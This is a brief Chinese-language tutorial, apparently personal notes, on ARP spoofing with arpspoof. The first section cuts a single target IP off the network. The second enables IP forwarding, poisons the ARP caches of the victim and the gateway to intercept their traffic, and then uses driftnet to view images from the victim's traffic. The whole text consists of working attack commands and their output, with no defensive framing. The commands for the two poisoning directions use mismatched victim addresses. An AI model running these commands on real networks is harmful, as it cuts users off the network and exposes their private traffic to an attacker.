1.断网:
arpspoof -i 网卡 -t 目标ip 网关
进行单个ip的断网攻击
root@kali:~# arpspoof -i eth0 -t 192.168.6.101 192.168.6.1
50:e5:49:eb:46:8d 0:19:21:3f:c3:e5 0806 42: arp reply 192.168.6.1 is-at 50:e5:49:eb:46:8d
50:e5:49:eb:46:8d 0:19:21:3f:c3:e5 0806 42: arp reply 192.168.6.1 is-at 50:e5:49:eb:46:8d
50:e5:49:eb:46:8d 0:19:21:3f:c3:e5 0806 42: arp reply 192.168.6.1 is-at 50:e5:49:eb:46:8d
50:e5:49:eb:46:8d 0:19:21:3f:c3:e5 0806 42: arp reply 192.168.6.1 is-at 50:e5:49:eb:46:8d
50:e5:49:eb:46:8d 0:19:21:3f:c3:e5 0806 42: arp reply 192.168.6.1 is-at 50:e5:49:eb:46:8d
50:e5:49:eb:46:8d 0:19:21:3f:c3:e5 0806 42: arp reply 192.168.6.1 is-at 50:e5:49:eb:46:8d
50:e5:49:eb:46:8d 0:19:21:3f:c3:e5 0806 42: arp reply 192.168.6.1 is-at 50:e5:49:eb:46:8d===================================================================================================2.毒化:
step1:开启ip转发
root@bt:~# cat /proc/sys/net/ipv4/ip_forward
0
root@bt:~# echo 1 >> /proc/sys/net/ipv4/ip_forward
root@bt:~# cat /proc/sys/net/ipv4/ip_forward
1
root@bt:~# step2:ARP欺骗攻击
root@bt:~# arpspoof -h
Usage: arpspoof [-i interface] [-t target] host
root@bt:~# arpspoof -i eth0 -t 192.168.1.5 192.168.1.1step3:数据重定向
使网关的数据重定向到攻击者的机器。(流量由网关到攻击者再到受攻击者)
root@bt:~# arpspoof -i eth0 -t 192.168.1.1 192.168.1.2到这就基本OK了
目标ip的流量都需要通过你的ip,你可以通过 driftnet 工具可以查看流向你ip的流量中的图片方法如下:
driftnet -i 网卡